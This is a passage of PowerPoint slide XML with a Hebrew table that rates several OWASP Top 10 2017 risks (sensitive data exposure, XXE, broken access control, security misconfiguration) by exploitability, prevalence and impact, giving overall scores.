                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - חשיפת מידע רגיש</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נפוצה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חמורה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - ישויות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חיצוניות (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חמורה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - בקרת גישה שבורה</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חמורה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="134400579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="287988">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - ניהול תצורה לא מאובטח</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נפוצה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתונה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
